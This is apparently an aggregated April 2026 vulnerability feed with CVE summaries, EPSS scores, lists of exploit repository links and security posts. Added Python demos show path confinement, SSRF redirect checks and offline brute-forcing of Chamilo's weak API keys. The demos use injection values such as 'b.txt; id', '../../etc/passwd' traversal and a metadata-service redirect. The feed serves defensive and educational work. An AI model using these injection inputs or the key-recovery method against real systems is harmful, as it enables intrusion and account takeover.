🚨 [CISA-2026:0408] CISA Adds One Known Exploited Vulnerability to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-1340 (secdb.nttzen.cloud/cve/detail/)
- Name: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Ivanti
- Product: Endpoint Manager Mobile (EPMM)
- Notes: Please adhere to Ivanti's guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please see: hub.ivanti.com/s/article/Secur ; support.mobileiron.com/mi/vsp/ ; support.mobileiron.com/mi/vsp/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260408 #cisa20260408 #cve_2026_1340 #cve20261340

##

CVE-2026-22200
(7.5 HIGH)

EPSS: 74.45%

updated 2026-01-27T21:31:40

2 posts

Enhancesoft osTicket versions up to and including 1.18.2 contain an arbitrary file read vulnerability in the ticket PDF export functionality. A remote attacker can submit a ticket containing crafted rich-text HTML that includes PHP filter expressions which are insufficiently sanitized before being processed by the mPDF PDF generator during export. When the attacker exports the ticket to PDF, the g

Nuclei template

2 repos

https://github.com/horizon3ai/CVE-2026-22200

https://github.com/Remnant-DB/CVE-2026-22200

metasploit at 2026-04-10T21:23:33.820Z ##

This week's release features a 2x faster msfvenom bootup time and new modules, including exploits for the Cisco Catalyst SD-WAN Controller Authentication Bypass (CVE-2026-20127) and osTicket Arbitrary File Read (CVE-2026-22200). rapid7.com/blog/post/pt-metasp

##

metasploit@infosec.exchange at 2026-04-10T21:23:33.000Z ##

This week's release features a 2x faster msfvenom bootup time and new modules, including exploits for the Cisco Catalyst SD-WAN Controller Authentication Bypass (CVE-2026-20127) and osTicket Arbitrary File Read (CVE-2026-22200). rapid7.com/blog/post/pt-metasp

##

CVE-2025-68161
(CVSS UNKNOWN)

EPSS: 0.03%

updated 2025-12-19T22:08:03

1 posts

The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the [verifyHostName](https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName) configuration attribute or the [log4j2.sslVerifyHostName](https://logging.apache.org/log4j/2.x/manual/systemproperties

EUVD_Bot@mastodon.social at 2026-04-10T17:01:09.000Z ##

🚨 EUVD-2026-21407

📊 Score: 6.3/10 (CVSS v3.1)
📦 Product: Apache Log4j Core, Apache Log4j Core
🏢 Vendor: Apache Software Foundation
📅 Updated: 2026-04-10

📝 The fix for CVE-2025-68161 logging.apache.org/security.ht was incomplete: it addressed hostname verification only when enabled via the log4j2.sslVerifyHostName https://logging.apache...

🔗 euvd.enisa.europa.eu/vulnerabi

#cybersecurity #infosec #euvd #cve #vulnerability

##

CVE-2025-6218
(7.8 HIGH)

EPSS: 4.76%

updated 2025-12-09T21:31:29

1 posts

RARLAB WinRAR Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of file paths within archive files. A

6 repos

https://github.com/absholi7ly/CVE-2025-6218-WinRAR-Directory-Traversal-RCE

https://github.com/speinador/CVE-2025-6218_WinRAR

https://github.com/ignis-sec/CVE-2025-6218

https://github.com/Chrxstxqn/CVE-2025-6218-WinRAR-RCE-POC

https://github.com/skimask1690/CVE-2025-6218-POC

https://github.com/mulwareX/CVE-2025-6218-POC

VirusBulletin@infosec.exchange at 2026-04-10T09:27:13.000Z ##

Robin Dost analyses a fresh UAC-0226 sample from 9 April 2026 and identifies it as a GIFTEDCROOK stealer variant. The chain starts with CVE-2025-6218 and CVE-2025-8088, then uses a LNK to launch a payload that decodes another binary, uses chunked data exfiltration, and reconstructs its C2 at runtime. blog.synapticsystems.de/obfusc

##

CVE-2025-55182
(10.0 CRITICAL)

EPSS: 84.89%

updated 2025-12-09T16:53:25

2 posts

### Impact There is an unauthenticated remote code execution vulnerability in React Server Components. We recommend upgrading immediately. The vulnerability is present in versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 of: * [react-server-dom-webpack](https://www.npmjs.com/package/react-server-dom-webpack) * [react-server-dom-parcel](https://www.npmjs.com/package/react-server-dom-parcel) * [react-s

Nuclei template

100 repos

https://github.com/MoLeft/React2Shell-Toolbox

https://github.com/ynsmroztas/NextRce

https://github.com/anuththara2007-W/CVE-2025-55182-Exploit-extension

https://github.com/mrknow001/RSC_Detector

https://github.com/freeqaz/react2shell

https://github.com/zzhorc/CVE-2025-55182

https://github.com/im-ezboy/CVE-2025-55182-zoomeye

https://github.com/AdityaBhatt3010/React2Shell-CVE-2025-55182

https://github.com/snipevx/React2Shell-POC

https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension

https://github.com/alptexans/RSC-Detect-CVE-2025-55182

https://github.com/surajhacx/react2shellpoc

https://github.com/assetnote/react2shell-scanner

https://github.com/Spritualkb/CVE-2025-55182-exp

https://github.com/techgaun/cve-2025-55182-scanner

https://github.com/shyambhanushali/React2Shell

https://github.com/santihabib/CVE-2025-55182-analysis

https://github.com/xalgord/React2Shell

https://github.com/sickwell/CVE-2025-55182

https://github.com/AdityaBhatt3010/React2Shell-CVE-2025-55182-The-Deserialization-Bug-That-Broke-the-Web

https://github.com/ejpir/CVE-2025-55182-research

https://github.com/CirqueiraDev/MassExploit-CVE-2025-55182

https://github.com/zack0x01/CVE-2025-55182-advanced-scanner-

https://github.com/zack0x01/vuln-app-CVE-2025-55182

https://github.com/sumanrox/rschunter

https://github.com/Archerkong/CVE-2025-55182

https://github.com/M4xSec/CVE-2025-55182-React2Shell-RCE-Shell

https://github.com/rix4uni/CVE-2025-55182

https://github.com/acheong08/CVE-2025-55182-poc

https://github.com/hexsh1dow/CVE-2025-55182

https://github.com/c0rydoras/CVE-2025-55182

https://github.com/hoosin/CVE-2025-55182

https://github.com/chrahman/react2shell-CVE-2025-55182-full-rce-script

https://github.com/msanft/CVE-2025-55182

https://github.com/songsanggggg/CVE-2025-55182

https://github.com/ZihxS/check-react-rce-cve-2025-55182

https://github.com/l4rm4nd/CVE-2025-55182

https://github.com/xkillbit/cve-2025-55182-scanner

https://github.com/hackersatyamrastogi/react2shell-ultimate

https://github.com/StealthMoud/CVE-2025-55182-Scanner

https://github.com/kondukto-io/vulnerable-next-js-poc

https://github.com/cybertechajju/R2C-CVE-2025-55182-66478

https://github.com/heiheishushu/rsc_detect_CVE-2025-55182

https://github.com/dwisiswant0/CVE-2025-55182

https://github.com/Chocapikk/CVE-2025-55182

https://github.com/momika233/CVE-2025-55182-bypass

https://github.com/MemerGamer/CVE-2025-55182

https://github.com/CymulateResearch/React2Shell-Scanner

https://github.com/kavienanj/CVE-2025-55182

https://github.com/RuoJi6/CVE-2025-55182-RCE-shell

https://github.com/aliclub0x00/CVE-2025-55182-POC-NEXTJS

https://github.com/theori-io/reactguard

https://github.com/pax-k/react2shell-CVE-2025-55182-full-rce-script

https://github.com/alfazhossain/CVE-2025-55182-Exploiter

https://github.com/vulncheck-oss/cve-2025-55182

https://github.com/Rsatan/Next.js-Exploit-Tool

https://github.com/gensecaihq/react2shell-scanner

https://github.com/alsaut1/react2shell-lab

https://github.com/websecuritylabs/React2Shell-Library

https://github.com/theman001/CVE-2025-55182

https://github.com/yanoshercohen/React2Shell_CVE-2025-55182

https://github.com/hualy13/CVE-2025-55182

https://github.com/jctommasi/react2shellVulnApp

https://github.com/LemonTeatw1/CVE-2025-55182-exploit

https://github.com/zr0n/react2shell

https://github.com/GelukCrab/React-Server-Components-RCE

https://github.com/Security-Phoenix-demo/react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478

https://github.com/pyroxenites/Nextjs_RCE_Exploit_Tool

https://github.com/keklick1337/CVE-2025-55182-golang-PoC

https://github.com/Cillian-Collins/CVE-2025-55182

https://github.com/BankkRoll/Quickcheck-CVE-2025-55182-React-and-CVE-2025-66478-Next.js

https://github.com/BeichenDream/CVE-2025-55182-GodzillaMemoryShell

https://github.com/timsonner/React2Shell-CVE-2025-55182

https://github.com/nehkark/CVE-2025-55182

https://github.com/sudo-Yangziran/CVE-2025-55182POC

https://github.com/Updatelap/CVE-2025-55182

https://github.com/whiteov3rflow/CVE-2025-55182-poc

https://github.com/ThemeHackers/CVE-2025-55182

https://github.com/shamo0/react2shell-PoC

https://github.com/Dh4v4l8/CVE-2025-55182-poc-tool

https://github.com/xcanwin/CVE-2025-55182-React-RCE

https://github.com/jf0x3a/CVE-2025-55182-exploit

https://github.com/kOaDT/poc-cve-2025-55182

https://github.com/VeilVulp/RscScan-cve-2025-55182

https://github.com/subhdotsol/CVE-2025-55182

https://github.com/emredavut/CVE-2025-55182

https://github.com/AliHzSec/CVE-2025-55182

https://github.com/Tiger-Foxx/exploit-react-CVE-2025-55182

https://github.com/logesh-GIT001/CVE-2025-55182

https://github.com/Cr4at0r/Next.js-RCE-Scanner-BurpSuite-Extension-

https://github.com/vijay-shirhatti/RSC-Detect-CVE-2025-55182

https://github.com/ejpir/CVE-2025-55182-bypass

https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC

https://github.com/Pizz33/CVE-2025-55182-burpscanner

https://github.com/fatguru/CVE-2025-55182-scanner

https://github.com/EynaExp/CVE-2025-55182-POC

https://github.com/hidden-investigations/react2shell-scanner

https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc

https://github.com/MrR0b0t19/CVE-2025-55182-shellinteractive

https://github.com/BlackTechX011/React2Shell

hackmag@infosec.exchange at 2026-04-09T20:30:03.000Z ##

⚪️ React2Shell vulnerability used for automated credential theft

🗨️ Cisco Talos researchers have discovered a large-scale campaign for automated credential theft exploiting the React2Shell vulnerability (CVE-2025-55182). In just 24 hours, the attackers managed to compromise 766 hosts across various cloud providers worldwide and steal database passwords, AWS keys,…

🔗 hackmag.com/news/react2shell-i

#news

##

oversecurity@mastodon.social at 2026-04-09T14:42:42.000Z ##

CVE-2025-55182 Exploitation Hits the Smart Home

Shortly after details of CVE-2025-55182 became public, we began noticing large volumes of exploitation attempts across our endpoint and network...

🔗️ [Bitdefender] link.is.it/jU5kX8

##

CVE-2025-8088
(8.8 HIGH)

EPSS: 7.05%

updated 2025-10-22T00:34:26

1 posts

A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET.

32 repos

https://github.com/nuky-alt/CVE-2025-8088

https://github.com/AdityaBhatt3010/CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal

https://github.com/0xAbolfazl/CVE-2025-8088-WinRAR-PathTraversal-PoC

https://github.com/knight0x07/WinRAR-CVE-2025-8088-PoC-RAR

https://github.com/hexsecteam/CVE-2025-8088-Winrar-Tool

https://github.com/nhattanhh/CVE-2025-8088

https://github.com/pentestfunctions/CVE-2025-8088-Multi-Document

https://github.com/travisbgreen/cve-2025-8088

https://github.com/techcorp/CVE-2025-8088-Exploit

https://github.com/xi0onamdev/WinRAR-CVE-2025-8088-Exploitation-Toolkit

https://github.com/ghostn4444/CVE-2025-8088

https://github.com/undefined-name12/CVE-2025-8088-Winrar

https://github.com/walidpyh/CVE-2025-8088

https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC

https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder

https://github.com/hbesljx/CVE-2025-8088-EXP

https://github.com/pescada-dev/-CVE-2025-8088

https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC

https://github.com/shaheeryasirofficial/CVE-2025-8088

https://github.com/kitsuneshade/WinRAR-Exploit-Tool---Rust-Edition

https://github.com/Jessica74016/CVE-2025-8088

https://github.com/jordan922/CVE-2025-8088

https://github.com/IsmaelCosma/CVE-2025-8088

https://github.com/Syrins/CVE-2025-8088-Winrar-Tool-Gui

https://github.com/Markusino488/cve-2025-8088

https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-

https://github.com/lennertdefauw/CVE-2025-8088

https://github.com/Shinkirou789/Cve-2025-8088-WinRar-vulnerability

https://github.com/starfallreverie/winrar-exploit

https://github.com/pentestfunctions/best-CVE-2025-8088

https://github.com/onlytoxi/CVE-2025-8088-Winrar-Tool

https://github.com/ilhamrzr/RAR-Anomaly-Inspector

VirusBulletin@infosec.exchange at 2026-04-10T09:27:13.000Z ##

Robin Dost analyses a fresh UAC-0226 sample from 9 April 2026 and identifies it as a GIFTEDCROOK stealer variant. The chain starts with CVE-2025-6218 and CVE-2025-8088, then uses a LNK to launch a payload that decodes another binary, uses chunked data exfiltration, and reconstructs its C2 at runtime. blog.synapticsystems.de/obfusc

##

CVE-2024-27297
(6.3 MEDIUM)

EPSS: 0.05%

updated 2025-06-27T13:15:23.240000

1 posts

Nix is a package manager for Linux and other Unix systems. A fixed-output derivation on Linux can send file descriptors to files in the Nix store to another program running on the host (or another fixed-output derivation) via Unix domain sockets in the abstract namespace. This allows the output of the derivation to be modified after Nix has registered the path as "valid" and immutable in the Nix data

thehackerwire@mastodon.social at 2026-04-09T05:00:05.000Z ##

🔴 CVE-2026-39860 - Critical (9)

Nix is a package manager for Linux and other Unix systems. A bug in the fix for CVE-2024-27297 allowed for arbitrary overwrites of files writable by the Nix process orchestrating the builds (typically the Nix daemon running as root in multi-user i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2024-34359
(9.6 CRITICAL)

EPSS: 56.67%

updated 2024-11-21T09:18:30.130000

1 posts

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also load

yayafa@jforo.com at 2026-04-08T21:51:15.000Z ##

Llama Drama: Serious flaw in a Python package for AI app development; systems and data could be compromised (CVE-2024-34359) | Codebook | Security News yayafa.com/2776397/ #AgenticAi #AI #ArtificialGeneralIntelligence #ArtificialIntelligence #LLAMA #Meta #MetaAI #エージェント型AI #人工知能 #汎用人工知能

##

CVE-2020-8562
(2.2 LOW)

EPSS: 0.06%

updated 2024-11-21T05:39:02.180000

1 posts

As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to prevent proxied connections from accessing link-local or localhost networks when making user-driven connections to Services, Pods, Nodes, or StorageClass service providers. As part of this mitigation Kubernetes does a DNS name resolution check and validates that response IPs are not in the link-local (169.254.0.0/16) or

raesene@infosec.exchange at 2026-04-09T10:57:06.000Z ##

Next in my series of blogs on unpatchable Kubernetes vulnerabilities is out. This time it's about TOCTOUs and SSRF

securitylabs.datadoghq.com/art

##

CVE-2026-32892
(0 None)

EPSS: 0.19%

4 posts

N/A

offseq at 2026-04-11T06:00:27.091Z ##

Chamilo LMS CRITICAL vuln (CVE-2026-32892): OS Command Injection via move_to POST param in fileManage.lib.php. Auth'd teachers can run arbitrary commands as www-data. Patch: 1.11.38/2.0.0-RC.3. Details: radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-04-11T06:00:07.000Z ##

🔴 CVE-2026-32892 - Critical (9.1)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values direct...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-11T06:00:27.000Z ##

Chamilo LMS CRITICAL vuln (CVE-2026-32892): OS Command Injection via move_to POST param in fileManage.lib.php. Auth'd teachers can run arbitrary commands as www-data. Patch: 1.11.38/2.0.0-RC.3. Details: radar.offseq.com/threat/cve-20 #OffSeq #Chamilo #CVE202632892 #infosec

##

CVE-2026-31940
(0 None)

EPSS: 0.04%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T05:03:39.000Z ##

🟠 CVE-2026-31940 - High (7.5)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading global bootstrap. This leads to session fixation....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31939
(0 None)

EPSS: 0.04%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T05:03:30.000Z ##

🟠 CVE-2026-31939 - High (8.3)

Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file deletion. User input from $_REQUEST['test'] is concatenated directly into filesystem path without ca...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
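
The two Chamilo file-handling bugs above (the fileManage.lib.php move() command injection, CVE-2026-32892, and the savescores.php path traversal, CVE-2026-31939) share one fix pattern: confine every user-supplied path to a base directory and never let it touch a shell. This added example shows that pattern in Python; it is not Chamilo code, the directory layout and file names are constructed for the demo, and the `mv` command string is only there to make the injection visible.

```python
"""Path confinement and shell-free file moves for the two Chamilo patterns above.

Added example, not Chamilo code. confine() keeps user-supplied paths inside a base
directory (the savescores.php traversal); move_safe() renames with a syscall instead
of a shell command (the fileManage.lib.php command injection). The directory layout
and file names below are constructed for the demo.
"""
import os
import shlex
import shutil
import tempfile
from pathlib import Path
from typing import Dict, List


def confine(base: str, user_path: str) -> Path:
    """Resolve user_path under base and refuse anything that escapes the base directory."""
    base_p = Path(base).resolve()
    target = (base_p / user_path).resolve()  # an absolute user_path replaces base_p and then fails the check
    if target != base_p and base_p not in target.parents:
        raise ValueError(f"path escapes {base_p}: {user_path!r}")
    return target


def move_command_vulnerable(src: str, dst: str) -> str:
    """The vulnerable pattern: interpolate raw input into a shell command string."""
    return f"mv {src} {dst}"  # a dst of 'x; id' runs id as the web server user


def move_argv_safe(src: str, dst: str) -> List[str]:
    """If a subprocess is unavoidable, quote each argument and pass an argv list, no shell."""
    return shlex.split(f"mv {shlex.quote(src)} {shlex.quote(dst)}")


def move_safe(base: str, src_rel: str, dst_rel: str) -> Path:
    """Confine both paths, then rename with a syscall: no shell, so no metacharacters."""
    src = confine(base, src_rel)
    dst = confine(base, dst_rel)
    dst.parent.mkdir(parents=True, exist_ok=True)
    os.replace(src, dst)
    return dst


def delete_safe(base: str, rel: str) -> bool:
    """Unlink only regular files that live under base; False when nothing was removed."""
    target = confine(base, rel)
    if not target.is_file():
        return False
    target.unlink()
    return True


def run_demo() -> Dict[str, object]:
    """Exercise the helpers in a temporary tree and report what each one did."""
    base = tempfile.mkdtemp()
    try:
        Path(base, "uploads").mkdir()
        Path(base, "uploads", "scores.txt").write_text("constructed content")
        out: Dict[str, object] = {}
        moved = move_safe(base, "uploads/scores.txt", "archive/scores.txt")
        out["moved_to"] = moved.relative_to(Path(base).resolve()).as_posix()
        out["moved_content"] = Path(base, "archive", "scores.txt").read_text()
        for label, evil in (("traversal", "../../etc/passwd"), ("absolute", "/etc/passwd")):
            try:
                confine(base, evil)
                out[label] = "allowed"
            except ValueError:
                out[label] = "rejected"
        out["deleted_missing"] = delete_safe(base, "archive/nope.txt")
        out["deleted"] = delete_safe(base, "archive/scores.txt")
        out["shell_string"] = move_command_vulnerable("a.txt", "b.txt; id")
        out["argv"] = move_argv_safe("a.txt", "b.txt; id")
        return out
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key:16s} {value!r}")
```

confine() resolves symlinks before comparing, so a link inside the base that points outside it is rejected as well; the check is on the final real path, not on the characters of the input.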

CVE-2026-33618
(0 None)

EPSS: 0.05%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T05:00:19.000Z ##

🟠 CVE-2026-33618 - High (8.8)

Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisor...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33710
(0 None)

EPSS: 0.03%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T04:49:08.000Z ##

🟠 CVE-2026-33710 - High (7.5)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (min == max), making the for...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
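
To see how little entropy the key derivation quoted above actually has, here is an added example in Python (not Chamilo code) that re-implements it and then recovers a key by enumeration. It assumes that PHP's md5() of an integer hashes the integer's decimal string form, so the seed is converted with str() before hashing; the timestamp and user id are constructed.

```python
"""Why md5(time() + user_id*5 - rand(10000, 10000)) is recoverable.

Added example, not Chamilo code. It re-implements the derivation the advisory
quotes so the search can be run offline. Assumption: PHP's md5() of an integer
hashes the integer's decimal string, hence str(seed) below.
"""
import hashlib
import secrets
from typing import List, Optional, Tuple

PHP_RAND_CONSTANT = 10000  # rand(10000, 10000) has min == max and always returns 10000


def weak_api_key(unix_time: int, user_id: int) -> str:
    """Key derivation as quoted in the advisory; every input is known or guessable."""
    seed = unix_time + user_id * 5 - PHP_RAND_CONSTANT
    return hashlib.md5(str(seed).encode()).hexdigest()


def recover_creation_time(api_key: str, user_id: int, t_guess: int, window: int) -> Optional[int]:
    """Brute-force the key for a known user_id over +/-window seconds around t_guess."""
    for t in range(t_guess - window, t_guess + window + 1):
        if weak_api_key(t, user_id) == api_key:
            return t
    return None


def recover_any(api_key: str, t_guess: int, window: int, max_user_id: int) -> List[Tuple[int, int]]:
    """Without knowing the user, enumerate (time, user_id) pairs that produce the key."""
    hits: List[Tuple[int, int]] = []
    for uid in range(1, max_user_id + 1):
        for t in range(t_guess - window, t_guess + window + 1):
            if weak_api_key(t, uid) == api_key:
                hits.append((t, uid))
    return hits


def candidate_space(window: int, max_user_id: int) -> int:
    """Number of md5 evaluations recover_any needs; compare with 2**128 for a random 128-bit key."""
    return (2 * window + 1) * max_user_id


def strong_api_key() -> str:
    """What the key should be: 256 bits from the OS CSPRNG, unrelated to time or user id."""
    return secrets.token_hex(32)


if __name__ == "__main__":
    created, uid = 1712800000, 42  # constructed creation time and user id
    key = weak_api_key(created, uid)
    print("key:", key)
    print("recovered time for user 42:", recover_creation_time(key, uid, created + 120, 600))
    print("all (time, user) pairs in window:", recover_any(key, created + 120, 600, 60))
    print("evaluations needed:", candidate_space(600, 60))
    print("replacement key:", strong_api_key())
```

Because the seed is a plain sum, the derivation also collides across users: the pair (t, uid) and the pair (t + 5, uid - 1) hash the same seed, so recover_any returns several plausible owners for one key and a key issued to one account can coincide with a key issued to a neighbouring account a few seconds later.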

CVE-2026-32252
(0 None)

EPSS: 0.02%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T04:48:59.000Z ##

🟠 CVE-2026-32252 - High (7.7)

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.9.0, a cross-tenant authorization bypass exists in Chartbrew in GET /team/:team_id/template/generate/:project...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33698
(0 None)

EPSS: 0.05%

2 posts

N/A

offseq at 2026-04-11T04:30:29.943Z ##

🔔 CVE-2026-33698: Chamilo LMS (<1.11.38) has a CRITICAL flaw — exposed install/ dir lets unauth attackers execute PHP & modify files. Upgrade to 1.11.38+ & restrict install/ directory access now! Details: radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-11T04:30:29.000Z ##

🔔 CVE-2026-33698: Chamilo LMS (<1.11.38) has a CRITICAL flaw — exposed install/ dir lets unauth attackers execute PHP & modify files. Upgrade to 1.11.38+ & restrict install/ directory access now! Details: radar.offseq.com/threat/cve-20 #OffSeq #Chamilo #Vuln

##

CVE-2026-40168
(0 None)

EPSS: 0.04%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T04:01:41.000Z ##

🟠 CVE-2026-40168 - High (8.2)

Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
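
The failure mode described above, validating only the user-supplied URL and then following redirects wherever they lead, is easy to reproduce offline. This added example in Python (not Postiz code) uses a constructed DNS table and a constructed map of HTTP responses so both fetchers run without a network; the hostnames, the metadata-service address and the response bodies are illustrative.

```python
"""Redirect re-validation for an outbound fetch (the Postiz pattern above).

Added example, not Postiz code. The DNS table and the HTTP responses are
constructed stand-ins so the redirect chain runs offline.
"""
import ipaddress
from typing import Dict, Optional, Tuple
from urllib.parse import urlparse

# Constructed resolver table: hostname -> address.
FAKE_DNS = {
    "cdn.example.com": "93.184.216.34",
    "intranet.example.internal": "10.0.0.5",
}

# Constructed server behaviour: url -> (status, Location header, body).
FAKE_HTTP: Dict[str, Tuple[int, Optional[str], str]] = {
    "https://cdn.example.com/feed": (302, "http://169.254.169.254/latest/meta-data/", ""),
    "http://169.254.169.254/latest/meta-data/": (200, None, "instance metadata"),
    "https://cdn.example.com/hop": (302, "https://intranet.example.internal/admin", ""),
    "https://intranet.example.internal/admin": (200, None, "internal admin page"),
    "https://cdn.example.com/ok": (200, None, "public content"),
}
REDIRECTS = (301, 302, 303, 307, 308)


def target_is_internal(url: str) -> bool:
    """True for loopback, private, link-local or unresolvable hosts: fail closed."""
    host = urlparse(url).hostname
    if host is None:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        if host not in FAKE_DNS:
            return True
        addr = ipaddress.ip_address(FAKE_DNS[host])
    return addr.is_loopback or addr.is_private or addr.is_link_local or not addr.is_global


def _get(url: str) -> Tuple[int, Optional[str], str]:
    if url not in FAKE_HTTP:
        raise LookupError(f"no constructed response for {url}")
    return FAKE_HTTP[url]


def fetch_vulnerable(url: str, max_redirects: int = 5) -> Dict[str, object]:
    """Validate only the URL the user supplied, then follow Location headers blindly."""
    if target_is_internal(url):
        return {"body": None, "blocked_at": 0, "chain": [url]}
    chain = [url]
    for _ in range(max_redirects + 1):
        status, location, body = _get(chain[-1])
        if status in REDIRECTS and location:
            chain.append(location)  # no check on the new destination
            continue
        return {"body": body, "blocked_at": None, "chain": chain}
    return {"body": None, "blocked_at": None, "chain": chain}


def fetch_hardened(url: str, max_redirects: int = 5) -> Dict[str, object]:
    """Validate every hop before requesting it; a redirect into the network is refused."""
    chain = [url]
    for hop in range(max_redirects + 1):
        current = chain[-1]
        if target_is_internal(current):
            return {"body": None, "blocked_at": hop, "chain": chain}
        status, location, body = _get(current)
        if status in REDIRECTS and location:
            chain.append(location)
            continue
        return {"body": body, "blocked_at": None, "chain": chain}
    return {"body": None, "blocked_at": None, "chain": chain}


if __name__ == "__main__":
    for path in ("feed", "hop", "ok"):
        u = f"https://cdn.example.com/{path}"
        print(path, "vulnerable:", fetch_vulnerable(u)["body"], "| hardened:", fetch_hardened(u))
```

Real HTTP clients follow redirects inside the library, so the hardened shape requires turning automatic redirects off and looping in your own code; each hop must be resolved and pinned the same way as the first, since the same DNS-rebinding race applies to every name in the chain.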

CVE-2026-40089
(0 None)

EPSS: 0.04%

1 post

N/A

thehackerwire@mastodon.social at 2026-04-10T07:11:09.000Z ##

🔴 CVE-2026-40089 - Critical (9.9)

Sonicverse is a Self-hosted Docker Compose stack for live radio streaming. The Sonicverse Radio Audio Streaming Stack dashboard contains a Server-Side Request Forgery (SSRF) vulnerability in its API client (apps/dashboard/lib/api.ts). Installation...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0234
(0 None)

EPSS: 0.00%

1 post

N/A

AAKL@infosec.exchange at 2026-04-09T17:14:18.000Z ##

Palo Alto posted several advisories yesterday, if you missed them:

- Critical: CVE-2026-0234 Cortex XSOAR: Improper Verification of Cryptographic Signature in Microsoft Teams integration security.paloaltonetworks.com/

- PAN-SA-2026-0004 Chromium: Monthly Vulnerability Update (April 2026) security.paloaltonetworks.com/

- CVE-2026-0233 Autonomous Digital Experience Manager: Improper validation of ADEM certificate security.paloaltonetworks.com/ #PaloAlto #infosec #vulnerability #Chromium

##

CVE-2026-0233
(0 None)

EPSS: 0.00%

1 post

N/A

AAKL@infosec.exchange at 2026-04-09T17:14:18.000Z ##

Palo Alto posted several advisories yesterday, if you missed them:

- Critical: CVE-2026-0234 Cortex XSOAR: Improper Verification of Cryptographic Signature in Microsoft Teams integration security.paloaltonetworks.com/

- PAN-SA-2026-0004 Chromium: Monthly Vulnerability Update (April 2026) security.paloaltonetworks.com/

- CVE-2026-0233 Autonomous Digital Experience Manager: Improper validation of ADEM certificate security.paloaltonetworks.com/ #PaloAlto #infosec #vulnerability #Chromium

##

CVE-2026-30461
